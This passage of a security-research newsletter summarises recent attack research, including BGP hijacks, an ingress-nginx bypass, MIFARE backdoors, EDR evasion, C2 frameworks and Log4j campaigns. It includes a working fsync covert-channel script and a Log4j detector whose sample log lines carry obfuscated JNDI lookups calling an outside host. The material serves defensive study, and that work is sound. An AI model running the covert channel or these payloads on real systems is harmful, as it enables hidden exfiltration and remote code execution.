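            rib[nbr][prefix] = {"path": rib[cur][prefix]["path"] + [nbr], "no_export": no_export}
            queue.append(nbr)

def monitors_see(rib, monitors, prefix):
    """A collector peers with one AS over eBGP; it only receives routes that AS may export."""
    return [name for name, peer_as in monitors.items()
            if prefix in rib.get(peer_as, {}) and not rib[peer_as][prefix]["no_export"]]

def traffic_diverted(rib, source, victim, victim_prefix, sub_prefix):
    """Follow the source's forwarding path for the victim prefix hop by hop; longest-prefix
    match diverts the packet at the first AS that holds the hijacked sub-prefix."""
    cur = source
    while True:
        if sub_prefix in rib.get(cur, {}):
            return True
        if cur == victim:
            return False
        cur = rib[cur][victim_prefix]["path"][-2]   # next hop towards the victim

def simulate(no_export=True):
    """Return (collectors that see the hijack, ASes whose traffic to the sub-prefix is diverted)."""
    graph = build_graph(LINKS)
    rib = {}
    announce(graph, rib, "V", "10.0.0.0/16")
    announce(graph, rib, "M", "10.0.1.0/24", no_export=no_export)
    monitors = {"collector-at-A": "A", "collector-at-B": "B", "collector-at-T1": "T1"}
    visible = monitors_see(rib, monitors, "10.0.1.0/24")
    affected = sorted(a for a in graph if a not in ("V", "M")
                      and traffic_diverted(rib, a, "V", "10.0.0.0/16", "10.0.1.0/24"))
    return visible, affected
```

With NO_EXPORT set, no collector sees the /24 while every AS whose path to the victim crosses T1 or T2 is diverted; drop the community and all three collectors see it, which is the monitoring assumption the paper breaks. The mitigation direction the authors propose follows from the model: monitoring needs vantage points inside the networks that install such routes, not only eBGP feeds from them.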
CVE-2024-7646: Ingress-NGINX Annotation Validation Bypass – A Deep Dive
Interesting vulnerability where a \r can cause real pain. Don’t let a Kubernetes pod get compromised, or it could get really painful.
The vulnerability stems from a flaw in the way ingress-nginx validates annotations on Ingress objects. Annotations in Kubernetes are used to attach arbitrary non-identifying metadata to objects. In the case of ingress-nginx, annotations are used to configure various behaviors of the ingress controller.
The vulnerability allows an attacker to inject malicious content into certain annotations, bypassing the intended validation checks. This can lead to arbitrary command injection and potential access to the ingress-nginx controller’s credentials, which, in default configurations, has access to all secrets in the cluster.
..
The attacker creates an Ingress object with a specially crafted annotation that includes a carriage return (\r) character to bypass validation. This allows the injection of unauthorized content and potential XSS attacks. For example:
https://www.armosec.io/blog/cve-2024-7646-ingress-nginx-annotation-validation-bypass/
MIFARE Classic: exposing the static encrypted nonce variant
Philippe Teuwen details a long time latent issue..
MIFARE Classic smart cards, developed and licensed by NXP, are widely used but have been subjected to numerous attacks over the years. Despite the introduction of new versions, these cards have remained vulnerable, even in card-only scenarios. In 2020, the FM11RF08S, a new variant of MIFARE Classic, was released by the leading Chinese manufacturer of unlicensed “MIFARE compatible” chips. This variant features specific countermeasures designed to thwart all known card-only attacks and is gradually gaining market share worldwide. In this paper, we present several attacks and unexpected findings regarding the FM11RF08S. Through empirical research, we discovered a hardware backdoor and successfully cracked its key. This backdoor enables any entity with knowledge of it to compromise all user-defined keys on these cards without prior knowledge, simply by accessing the card for a few minutes. Additionally, our investigation into older cards uncovered another hardware backdoor key that was common to several manufacturers.
https://eprint.iacr.org/2024/1275.pdf
Satellite bus vulnerabilities and their attacker paths and satellite firmware security threat analysis model
A Chinese analysis of various small satellites and their vulnerabilities.
Offense
Attack capability, techniques and trade-craft.
Windows Downdate
Alon Leviev releases a tool whose adversarial use we can expect in 3..2..
A tool that takes over Windows Updates to craft custom downgrades and expose past fixed vulnerabilities
https://github.com/SafeBreach-Labs/WindowsDowndate
Internal of Malice (Evil Network)
From China..
Internal of Malice (Evil Network) strives to implement a post-exploit infrastructure that is compatible with CS, MSF, and Sliver ecosystems, while providing higher scalability and concealment, and a set of engineering solutions.
C2 is more challenging than other areas, both in design and implementation.
What we want to try to design is the next generation of C2, a C2 framework that is more advanced in terms of interactive experience, scalability, port confrontation, traffic confrontation, etc.
Currently, v0.0.1 is still a long way from the complete form of the design goal. However, due to the development progress, we decided to accept the opinions from the community first. We cannot create the most advanced tools in isolation.
https://chainreactors.github.io/wiki/IoM/
An overview article has been published:
Summarizes some core design concepts of the next generation C2.
Rust is the ideal language for the next generation of C2, providing low-level operation capabilities, cross-platform compilation, and the ability to modify almost all features.
Modular, hot-swappable, and highly customizable implant design. We break down all functions into building blocks, and use the features and conditional compilation provided by Rust to achieve any combination.
Support webshell, and open up the underlying operation capabilities, reuse C2's plug-in ecosystem, such as the assembly-execute capability of the CLR ecosystem, Java's JNI and JVMTI, etc.
OPSEC first, and open OPSEC custom interfaces as much as possible
Highly controllable flow rate
From C2 to bootkit/rootkit
Listeners and servers should be decoupled, and the next generation of C2 should be distributed by nature
Compatibility with existing C2 ecosystems, such as CobaltStrike's BOF, Sliver's Armory, etc.
......
Phishing in PWA Applications: A New Method Targeting Mobile Users
Jakub Osmani details an interesting and rather novel mobile offensive technique here. Now that it has been reported, we should expect an uptick..
Standard phishing delivery techniques were combined with a novel method of phishing; targeting Android and iOS users via PWAs, and on Android also WebAPKs.
Insidiously, installing a PWA/WebAPK application does not warn the victim about installing a third-party application.
On Android, these phishing WebAPKs even appear to have been installed from the Google Play store.
Most of the observed applications targeted clients of Czech banks, but we also observed one phishing app that targeted a Hungarian bank and another targeting a Georgian bank.
Based on the C&C servers utilized and backend infrastructure, we conclude that two different threat actors were operating the campaigns.
Thanks to our discovery of operator panels on different domains, we were able to notify the victims’ banks in order to protect them.
Sync+Sync: A Covert Channel Built on fsync with Storage
Qisheng Jiang and Chundong Wang show the subtlety of what is possible..
We accordingly build a covert channel named Sync+Sync. Sync+Sync delivers a transmission bandwidth of 20,000 bits per second at an error rate of about 0.40% with an ordinary solid-state drive. Sync+Sync can be conducted in cross-disk partition, cross-file system, cross-container, cross-virtual machine, and even cross-disk drive fashions, without sharing data between programs. Next, we launch side-channel attacks with Sync+Sync and manage to precisely detect operations of a victim database (e.g., insert/update and B-Tree node split).
https://www.usenix.org/system/files/sec23winter-prepub-554-jiang.pdf
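The mechanism behind the quoted numbers, as an added loopback sketch that is not the authors' code: a sender hammers fsync() on its own file during a time slot to signal a 1 and sleeps to signal a 0, while a receiver measures the median latency of its own fsync() on an unrelated file and thresholds it. The slot length, the calibration method, the two file names and the 8-bit framing are assumptions of this example; there is no clock synchronisation between the two processes, so expect bit errors on a real run, and the effect only shows on a disk-backed filesystem (tmpfs does not contend).

```python
import os
import statistics
import tempfile
import time
from multiprocessing import Process


def fsync_latency(fd):
    """One dirty byte followed by fsync(); its duration is the receiver's only observation."""
    t0 = time.perf_counter()
    os.write(fd, b"\x00")
    os.fsync(fd)
    return time.perf_counter() - t0


def send_bits(path, bits, slot_seconds):
    """Sender: for each bit, hammer fsync() on its own file for a 1, stay idle for a 0.
    No data is ever shared with the receiver; the contention happens in the storage stack."""
    fd = os.open(path, os.O_WRONLY | os.O_CREAT, 0o600)
    try:
        for bit in bits:
            end = time.perf_counter() + slot_seconds
            if bit:
                while time.perf_counter() < end:
                    os.write(fd, b"\x01")
                    os.fsync(fd)
            else:
                time.sleep(slot_seconds)
    finally:
        os.close(fd)


def receive_slots(fd, n_slots, slot_seconds):
    """Receiver: per slot, the median fsync() latency on an unrelated file."""
    medians = []
    for _ in range(n_slots):
        end = time.perf_counter() + slot_seconds
        samples = []
        while time.perf_counter() < end:
            samples.append(fsync_latency(fd))
        medians.append(statistics.median(samples))
    return medians


def threshold_from_calibration(quiet, busy):
    """Midpoint between 'nobody syncing' and 'sender syncing' medians (assumed calibration)."""
    return (statistics.median(quiet) + statistics.median(busy)) / 2


def decode(medians, threshold):
    """A slow slot means the sender was syncing, i.e. a 1."""
    return [1 if m > threshold else 0 for m in medians]


def bytes_to_bits(data):
    return [(b >> (7 - i)) & 1 for b in data for i in range(8)]


def bits_to_bytes(bits):
    """Inverse of bytes_to_bits; len(bits) must be a multiple of 8."""
    return bytes(sum(bit << (7 - i) for i, bit in enumerate(bits[k:k + 8]))
                 for k in range(0, len(bits), 8))


if __name__ == "__main__":
    slot = 0.05  # assumed slot length; the paper's rates need far shorter slots
    with tempfile.TemporaryDirectory() as d:
        sender_file = os.path.join(d, "sender")
        rx = os.open(os.path.join(d, "receiver"), os.O_WRONLY | os.O_CREAT, 0o600)
        quiet = receive_slots(rx, 4, slot)                       # calibration: idle
        p = Process(target=send_bits, args=(sender_file, [1] * 4, slot))
        p.start()
        busy = receive_slots(rx, 4, slot)                        # calibration: busy
        p.join()
        thr = threshold_from_calibration(quiet, busy)
        payload = bytes_to_bits(b"Hi")                           # constructed message
        p = Process(target=send_bits, args=(sender_file, payload, slot))
        p.start()
        medians = receive_slots(rx, len(payload), slot)
        p.join()
        os.close(rx)
        got = decode(medians, thr)
        print("sent:", payload)
        print("recv:", got, bits_to_bytes(got))
```

The defensive reading of the same code is that any process that can call fsync() on any file on the same device is a potential listener, which is why the paper's cross-container and cross-VM claims matter more than the raw bandwidth.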
Hookchain
Helvio Junior highlights a gap in EDRs; it will be interesting to see how quickly it is addressed.
Through a precise combination of IAT Hooking techniques, dynamic SSN resolution, and indirect system calls, HookChain redirects the execution flow of Windows subsystems in a way that remains invisible to the vigilant eyes of EDRs that only act on Ntdll.dll, without requiring changes to the source code of the applications and malwares involved.
https://github.com/helviojunior/hookchain/
Exploitation
What is being exploited.
CVE-2024-23897 Enabled Ransomware Attack on Indian Banks
Shwetanjali Rasal details the vulnerability exploited by this ransomware actor..
Brontoo Technology Solutions filed a report with CERT-In (Indian Computer Emergency Response Team) which revealed that the attack originated from a misconfigured Jenkins server, setting off the chain of events. On further analysis, the threat actor leveraged CVE-2024-23897 to gain initial unauthorized access to the victim’s environment.
The gift that keeps on giving: A new opportunistic Log4j campaign
Andy Giron, Frederic Baguelin, Eslam Salem and Matt Mills highlight the risk from zombie vulnerabilities… the long tail of vulnerability, even for high-profile vulnerabilities, is indeed long.
Despite being over two years old, the Log4j vulnerability (Log4Shell) remains a persistent and evolving threat, as demonstrated by a recent opportunistic campaign leveraging it for crypto-mining and system compromise.
The attack uses obfuscated LDAP requests to evade detection, leading to the execution of malicious scripts on compromised systems.
The script establishes persistence, performs system reconnaissance, and exfiltrates data, maintaining control through multiple backdoors and encrypted communication channels.
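The "obfuscated LDAP requests" are obfuscated JNDI lookups: the literal string jndi is rebuilt at evaluation time from nested Log4j lookups such as ${lower:J}, ${::-j} and ${env:NOPE:-j}, which defeats any detector that grep's for ${jndi:. As an added example that is not from the authors' report, the scanner below peels those lookups off the way Log4j 2 would before matching; the sample access-log lines are constructed, the lookup forms modelled are only lower, upper and the :-default fallback, and anything else is left untouched.

```python
import re

# Innermost ${...}: a body with no nested '$', '{' or '}'.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# What remains once the obfuscation has been collapsed.
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def resolve(body):
    """Evaluate one lookup body as Log4j 2 (before 2.15) would for the attacker's purpose:
    - ${anything:-default}: an unresolvable name (env, sys, date, empty) yields the default
    - ${lower:X} / ${upper:X}: case conversion
    Returns None for lookups this model does not evaluate."""
    if ":-" in body:
        return body.split(":-", 1)[1]
    key = body.lower()
    if key.startswith("lower:"):
        return body[6:].lower()
    if key.startswith("upper:"):
        return body[6:].upper()
    return None


def normalize(text, max_passes=16):
    """Collapse innermost lookups repeatedly until nothing resolvable remains."""
    for _ in range(max_passes):
        changed = False

        def repl(m):
            nonlocal changed
            out = resolve(m.group(1))
            if out is None:
                return m.group(0)
            changed = True
            return out

        text = INNER_LOOKUP.sub(repl, text)
        if not changed:
            break
    return text


def scan(lines):
    """Return (line_index, normalized_line) for every line carrying a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        norm = normalize(line)
        if JNDI.search(norm):
            hits.append((i, norm))
    return hits


# Constructed sample lines (Apache-style access log, RFC 5737 test addresses).
SAMPLE_LOGS = [
    '10.0.0.1 - - "GET / HTTP/1.1" 200 "-" "${jndi:ldap://203.0.113.5:1389/a}"',
    '10.0.0.2 - - "GET / HTTP/1.1" 200 "-" '
    '"${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://203.0.113.5:1389/a}"',
    '10.0.0.3 - - "GET /?x=${${env:NaN:-j}n${::-d}i:${::-l}dap://203.0.113.5/x} HTTP/1.1" 200',
    '10.0.0.4 - - "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for idx, norm in scan(SAMPLE_LOGS):
        print(f"line {idx}: {norm}")
```

A naive rule that matches only the literal ${jndi: fires on the first sample line alone; the normalized form is also the right thing to log and to pivot on, since it exposes the callback host the obfuscation was hiding.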
Tooling and Techniques
Low level tooling and techniques for attack and defence researchers…
Atropos: Effective Fuzzing of Web Applications for Server-Side Vulnerabilities
Emre Güler, Sergej Schumilo, Moritz Schloegel, Nils Bars, Philipp Görz, Xinyi Xu, Cemal Kaygusuz, and Thorsten Holz show that tailored fuzzers can bring performance gains..
In this paper, we present ATROPOS, a snapshot-based, feedback-driven fuzzing method tailored for PHP-based web applications. Our approach considers the challenges associated with web applications, such as maintaining session state and generating highly structured inputs. Moreover, we propose a feedback mechanism to automatically infer the key-value structure used by web applications. Combined with eight new bug oracles, each covering a common class of vulnerabilities in server-side web applications, ATROPOS is the first approach to fuzz web applications effectively and efficiently. Our evaluation shows that ATROPOS significantly outperforms the current state of the art in web application testing. In particular, it finds, on average, at least 32% more bugs, while not reporting a single false positive on different test suites. When analyzing real-world web applications, we identify seven previously unknown vulnerabilities that can be exploited even by unauthenticated users.
https://www.usenix.org/system/files/sec23winter-prepub-167-guler.pdf
Dancer in the Dark: Synthesizing and Evaluating Polyglots for Blind Cross-Site Scripting
Robin Kirchner, Jonas Möller, Marius Musch, David Klein, Konrad Rieck and Martin Johns show that niche bugs/techniques applied to a large enough population will get you something.
Based on these polyglots, we conduct a study of BXSS vulnerabilities on the Tranco Top 100,000 websites. We discover 20 vulnerabilities in 18 web-based backend systems. These findings demonstrate the efficacy of our detection approach and point at a largely unexplored attack surface in web security.
https://www.usenix.org/system/files/sec23winter-prepub-226-kirchner-rev.pdf
Blade Razor 刃影
An AI-Driven Pentesting Solution from China
It has been verified that the application of LLM in penetration testing is feasible. The following four points have a decisive influence on the final effect:
For the selection of large models, it is sufficient as long as the parameter count is large. There is no need to pay too much attention to whether the model has been fine-tuned for a specific field; knowledge of a specific field can be supplied through RAG.
RAG is equivalent to an external knowledge base that is independent of the LLM. As long as the private knowledge base is complete enough, its "experience" will be rich enough.
Prompts: simulate various roles through prompts, such as hacker, security researcher, security engineer, etc., so that the LLM can better understand our needs.
The richer the external tool arsenal, the better
https://github.com/hangxin1940/bladerazor
C++ Unwind Exception Metadata: A Hidden Reverse Engineering Bonanza
Rolf Rolles provides a source of SRE insight..
this blog entry is about a different kind of C++ exception metadata: namely, wind and unwind. In the remainder of this blog entry, we introduce wind and unwind metadata -- what it is, and when and why the compiler inserts it -- before describing how to exploit it when reverse engineering C++ programs.
https://www.msreverseengineering.com/blog/2024/8/20/c-unwind-metadata-1
Footnotes
Some other small (and not so small) bits and bobs which might be of interest.
Aggregate reporting
‘Your Data is Stolen and Encrypted’: The Ransomware Victim Experience
Artificial intelligence
Books
The Data Detective at the Carnival - Children’s book..
Events
Nothing this week
Unless stated otherwise, linked or referenced content does not necessarily represent the views of the NCSC and reference to third parties or content on their websites should not be taken as endorsement of any kind by the NCSC. The NCSC has no control over the content of third party websites and consequently accepts no responsibility for your use of them.
This newsletter is subject to the NCSC website terms and conditions which can be found at https://www.ncsc.gov.uk/section/about-this-website/terms-and-conditions and you can find out more about how we will treat your personal information in our privacy notice at https://www.ncsc.gov.uk/section/about-this-website/privacy-statement.